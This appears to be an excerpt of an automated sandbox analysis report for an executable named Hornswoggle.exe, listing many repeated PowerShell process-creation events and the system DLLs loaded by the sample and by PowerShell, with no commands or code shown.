Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
